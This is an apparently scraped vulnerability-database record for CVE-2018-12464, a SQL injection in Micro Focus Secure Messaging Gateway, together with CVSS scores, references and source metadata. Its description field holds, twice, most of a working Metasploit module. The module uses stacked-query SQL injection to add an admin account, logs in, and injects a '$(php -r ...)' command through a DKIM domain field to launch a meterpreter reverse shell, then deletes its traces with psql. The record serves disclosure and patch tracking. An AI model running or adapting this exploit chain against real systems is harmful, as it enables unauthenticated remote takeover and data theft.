var-201806-1215
Vulnerability from variot
A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user.
One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.
manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
to access this endpoint without having a valid session.
Combining these vulnerabilities gives the opportunity execute operation system commands under the context
of the web user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
['CVE', '2018-12464'],
['CVE', '2018-12465'],
['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
],
'DefaultOptions' =>
{
'Payload' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Jun 19 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)
end
def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
'vars_post' => {
'appkey' => sql
}
)
end
def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end
def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end
def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })
if res && res.code == 200 && res.body.include?('DbNodeId')
# Defining as global variable since we need to access them later within clean up function.
begin
@domainid = res.get_json_document['Nodes'][0]['DbNodeId']
@dkimid = res.get_json_document['Nodes'][1]['DbNodeId']
rescue => e
fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
end
print_good('Payload is successfully implanted')
else
something_went_wrong
end
end
def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')
# Defining as global variable since we need to access them later within clean up function.
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"
execute_query(query)
res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")
if res && res.code == 200 && res.body.include?(@username)
print_good("User successfully created. Username : #{@username}")
else
something_went_wrong
end
end
def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end
def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end
create_user
cookie = login
implant_payload(cookie)
print_status('Triggering an implanted payload')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
'cookie' => cookie,
'vars_get' => {
'cache' => 0,
},
'vars_post' => {
'DkimRecordId' => @dkimid
}
})
end
def on_new_session(session) print_status('Cleaning up...') cmd = "" cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' cmd << "DELETE FROM account WHERE loginname ='#{@username}';" cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" cmd << '"' session.shell_command_token(cmd) end
end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-1215",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "secure messaging gateway",
"scope": "lt",
"trust": 1.0,
"vendor": "microfocus",
"version": "471"
},
{
"model": "micro focus secure messaging gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "microfocus",
"version": "471"
},
{
"model": "focus secure messaging gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "micro",
"version": "471"
}
],
"sources": [
{
"db": "BID",
"id": "106343"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MEHMET INCE",
"sources": [
{
"db": "BID",
"id": "106343"
},
{
"db": "PACKETSTORM",
"id": "148758"
}
],
"trust": 0.4
},
"cve": "CVE-2018-12464",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-12464",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-122426",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-12464",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security@opentext.com",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-12464",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-12464",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "security@opentext.com",
"id": "CVE-2018-12464",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-12464",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-018",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-122426",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. \n An unauthenticated user can execute a terminal command under the context of the web user. \n\n One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n to access this endpoint without having a valid session. \n\n Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n of the web user. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e\n [\n \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n ],\n \u0027References\u0027 =\u003e\n [\n [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n [\u0027CVE\u0027, \u00272018-12464\u0027],\n [\u0027CVE\u0027, \u00272018-12465\u0027],\n [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n ],\n \u0027DefaultOptions\u0027 =\u003e\n {\n \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n },\n \u0027Platform\u0027 =\u003e [\u0027php\u0027],\n \u0027Arch\u0027 =\u003e ARCH_PHP,\n \u0027Targets\u0027 =\u003e [[ \u0027Automatic\u0027, { }]],\n \u0027Privileged\u0027 =\u003e false,\n \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n \u0027DefaultTarget\u0027 =\u003e 0\n ))\n\n register_options(\n [\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n ]\n )\n end\n\n def execute_query(query)\n #\n # We have a very rare SQLi case in here. Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n # get back the output of query !\n #\n sql = rand_text_alphanumeric(3 + rand(3))\n sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n sql \u003c\u003c query\n sql \u003c\u003c \"; -- \"\n sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n send_request_cgi(\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n \u0027vars_post\u0027 =\u003e {\n \u0027appkey\u0027 =\u003e sql\n }\n )\n\n end\n\n def something_went_wrong\n fail_with Failure::Unknown, \u0027Something went wrong\u0027\n end\n\n def check\n r = rand_text_numeric(15..35)\n res = execute_query(\"SELECT #{r}\")\n unless res\n vprint_error \u0027Connection failed\u0027\n return CheckCode::Unknown\n end\n unless res.code == 200 \u0026\u0026 res.body.include?(r)\n return CheckCode::Safe\n end\n CheckCode::Vulnerable\n end\n\n def implant_payload(cookie)\n print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n p = [\n {\n :id =\u003e \u0027temp_0\u0027,\n :Description =\u003e rand_text_alpha(5),\n :DkimList =\u003e [\n {\n :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n :Selector =\u003e \u0027\u0027,\n :TempId =\u003e \u0027tempDkim_1\u0027\n }\n ]\n }\n ].to_json\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n \u0027cookie\u0027 =\u003e cookie,\n \u0027vars_get\u0027 =\u003e {\n \u0027cache\u0027 =\u003e 0,\n },\n \u0027vars_post\u0027 =\u003e {\n \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n \u0027SaveData\u0027 =\u003e p\n }\n })\n\n if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n # Defining as global variable since we need to access them later within clean up function. \n begin\n @domainid = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n @dkimid = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n rescue =\u003e e\n fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n end\n print_good(\u0027Payload is successfully implanted\u0027)\n else\n something_went_wrong\n end\n end\n\n def create_user\n # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n # issue location where requires a valid session !\n print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n # Defining as global variable since we need to access them later within clean up function. \n @username = rand_text_alpha_lower(5..25)\n @userid = rand_text_numeric(6..8)\n query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n execute_query(query)\n res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n print_good(\"User successfully created. Username : #{@username}\")\n else\n something_went_wrong\n end\n end\n\n def login\n print_status(\"Authenticating with created user\")\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n \u0027vars_post\u0027 =\u003e {\n \u0027username\u0027 =\u003e @username,\n \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n \u0027LimitInterfaceId\u0027 =\u003e 1\n }\n )\n if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n print_good(\u0027Successfully authenticated\u0027)\n cookie = res.get_cookies\n else\n something_went_wrong\n end\n cookie\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n end\n\n create_user\n cookie = login\n implant_payload(cookie)\n\n print_status(\u0027Triggering an implanted payload\u0027)\n send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n \u0027cookie\u0027 =\u003e cookie,\n \u0027vars_get\u0027 =\u003e {\n \u0027cache\u0027 =\u003e 0,\n },\n \u0027vars_post\u0027 =\u003e {\n \u0027DkimRecordId\u0027 =\u003e @dkimid\n }\n })\n\n end\n\n def on_new_session(session)\n print_status(\u0027Cleaning up...\u0027)\n cmd = \"\"\n cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n cmd \u003c\u003c \u0027\"\u0027\n session.shell_command_token(cmd)\n end\n\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-12464"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "BID",
"id": "106343"
},
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "PACKETSTORM",
"id": "148758"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-122426",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-12464",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "45083",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018",
"trust": 0.7
},
{
"db": "BID",
"id": "106343",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "148758",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-122426",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "BID",
"id": "106343"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "PACKETSTORM",
"id": "148758"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"id": "VAR-201806-1215",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
}
],
"trust": 0.85
},
"last_update_date": "2024-11-23T22:34:15.375000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Critical SQL Injection Vulnerability in SMG (CVE-2018-12464)",
"trust": 0.8,
"url": "https://support.microfocus.com/kb/doc.php?id=7023132"
},
{
"title": "Micro Focus Secure Messaging Gateway Web administration and quarantine Component SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81644"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
},
{
"trust": 2.0,
"url": "https://support.microfocus.com/kb/doc.php?id=7023132"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/45083/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12464"
},
{
"trust": 0.3,
"url": "https://www.exploit-db.com/exploits/45083"
},
{
"trust": 0.3,
"url": "https://www.microfocus.com/products/secure-messaging-gateway/"
},
{
"trust": 0.3,
"url": "https://www.microfocus.com"
},
{
"trust": 0.1,
"url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
},
{
"trust": 0.1,
"url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "BID",
"id": "106343"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "PACKETSTORM",
"id": "148758"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-122426"
},
{
"db": "BID",
"id": "106343"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"db": "PACKETSTORM",
"id": "148758"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULHUB",
"id": "VHN-122426"
},
{
"date": "2018-06-27T00:00:00",
"db": "BID",
"id": "106343"
},
{
"date": "2018-09-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"date": "2018-07-31T14:49:49",
"db": "PACKETSTORM",
"id": "148758"
},
{
"date": "2018-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"date": "2018-06-29T16:29:00.277000",
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-122426"
},
{
"date": "2018-06-27T00:00:00",
"db": "BID",
"id": "106343"
},
{
"date": "2018-09-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006867"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-018"
},
{
"date": "2024-11-21T03:45:16.117000",
"db": "NVD",
"id": "CVE-2018-12464"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Micro Focus Secure Messaging Gateway In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006867"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sql injection",
"sources": [
{
"db": "PACKETSTORM",
"id": "148758"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-018"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
